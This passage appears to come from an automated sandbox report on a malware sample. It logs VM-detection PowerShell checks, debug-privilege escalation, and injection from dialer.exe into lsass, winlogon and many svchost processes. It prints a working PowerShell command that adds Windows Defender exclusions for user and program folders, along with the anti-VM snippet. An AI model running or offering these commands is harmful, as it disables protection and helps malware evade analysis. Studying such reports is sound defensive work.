Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 0000000A.00000000.1759493693.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000011.00000002.2977200435.000001D558DE0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: C:\Windows\System32\dialer.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC647E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00000225DC647E70
Source: C:\Windows\System32\dialer.exe Code function: 4_2_00007FF78AB314E4 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,K32EnumProcesses,OpenProcess,K32EnumProcessModules,ReadProcessMemory,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 4_2_00007FF78AB314E4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dialer.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dialer.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC647E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00000225DC647E70
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC64B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00000225DC64B50C
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC6A7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00000225DC6A7E70
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC6AB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00000225DC6AB50C
Source: C:\Windows\System32\lsass.exe Code function: 8_2_00000202C0AE7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00000202C0AE7E70
Source: C:\Windows\System32\lsass.exe Code function: 8_2_00000202C0AEB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00000202C0AEB50C
Source: C:\Windows\System32\svchost.exe Code function: 9_2_000002A661307E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_000002A661307E70
Source: C:\Windows\System32\svchost.exe Code function: 9_2_000002A66130B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_000002A66130B50C
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAE297E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_000002BAAE297E70
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAE29B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_000002BAAE29B50C
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000026A879CB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_0000026A879CB50C
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000026A879C7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_0000026A879C7E70
Source: C:\Windows\System32\svchost.exe Code function: 12_2_00000179537AB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00000179537AB50C
Source: C:\Windows\System32\svchost.exe Code function: 12_2_00000179537A7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00000179537A7E70
Source: C:\Windows\System32\svchost.exe Code function: 12_2_0000017953D4B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_0000017953D4B50C
Source: C:\Windows\System32\svchost.exe Code function: 12_2_0000017953D47E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_0000017953D47E70
Source: C:\Windows\System32\svchost.exe Code function: 13_2_000002295D567E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_000002295D567E70
Source: C:\Windows\System32\svchost.exe Code function: 13_2_000002295D56B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_000002295D56B50C
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000025306E67E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_0000025306E67E70
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000025306E6B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_0000025306E6B50C
Source: C:\Windows\System32\svchost.exe Code function: 15_2_000001845B3B7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_000001845B3B7E70
Source: C:\Windows\System32\svchost.exe Code function: 15_2_000001845B3BB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_000001845B3BB50C
Source: C:\Windows\System32\svchost.exe Code function: 16_2_000001ADECD4B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_000001ADECD4B50C
Source: C:\Windows\System32\svchost.exe Code function: 16_2_000001ADECD47E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_000001ADECD47E70
Source: C:\Windows\System32\svchost.exe Code function: 17_2_000001D55907B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_000001D55907B50C
Source: C:\Windows\System32\svchost.exe Code function: 17_2_000001D559077E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_000001D559077E70
Source: C:\Windows\System32\svchost.exe Code function: 18_2_00000241A9EAB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00000241A9EAB50C
Source: C:\Windows\System32\svchost.exe Code function: 18_2_00000241A9EA7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00000241A9EA7E70
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Code function: 21_2_000002152C3EB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 21_2_000002152C3EB50C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Code function: 21_2_000002152C3E7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 21_2_000002152C3E7E70
Source: C:\Windows\System32\svchost.exe Code function: 24_2_000001CD73197E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_000001CD73197E70
Source: C:\Windows\System32\svchost.exe Code function: 24_2_000001CD7319B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_000001CD7319B50C
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E89B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_000002824E89B50C
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E897E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_000002824E897E70
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E8FB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_000002824E8FB50C
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E8F7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_000002824E8F7E70
Source: C:\Windows\System32\svchost.exe Code function: 27_2_0000021B47B37E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 27_2_0000021B47B37E70
Source: C:\Windows\System32\svchost.exe Code function: 27_2_0000021B47B3B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 27_2_0000021B47B3B50C

HIPS / PFW / Operating System Protection Evasion

Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAE260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1845B380000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C1A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC670000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\lsass.exe base: 202C0B10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2A661330000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAED80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 26A87F40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 179537D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2295D590000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 25306E90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1845B940000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1ADECD70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1D5590A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 241A9ED0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1CD731C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2824E8C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 21B47B60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20870090000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 17184290000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 23FD3FA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1B5645B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2108BCF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 29166980000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 19E27BC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\explorer.exe base: 1380000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1F4197C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1F8F1A00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 228BE340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\conhost.exe base: 20823A10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FDFD900000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 25CC2A30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 144B2660000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CF49670000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\conhost.exe base: 1988E640000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1F724890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 222A2280000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 222A22E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Code function: 4_2_00007FF78AB31DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess, 4_2_00007FF78AB31DB4
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\winlogon.exe EIP: DC612908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 612D2908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\dwm.exe EIP: AE262908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 87992908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 53772908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D532908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 67D2908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5B382908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: EBFD2908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 59042908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe EIP: 2C1A2908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: A9E72908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 73162908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4E862908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 473C2908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6F9D2908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 83BC2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: DC672908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: C0B12908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 61332908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: AED82908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 87F42908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 537D2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 5D592908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6E92908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 5B942908
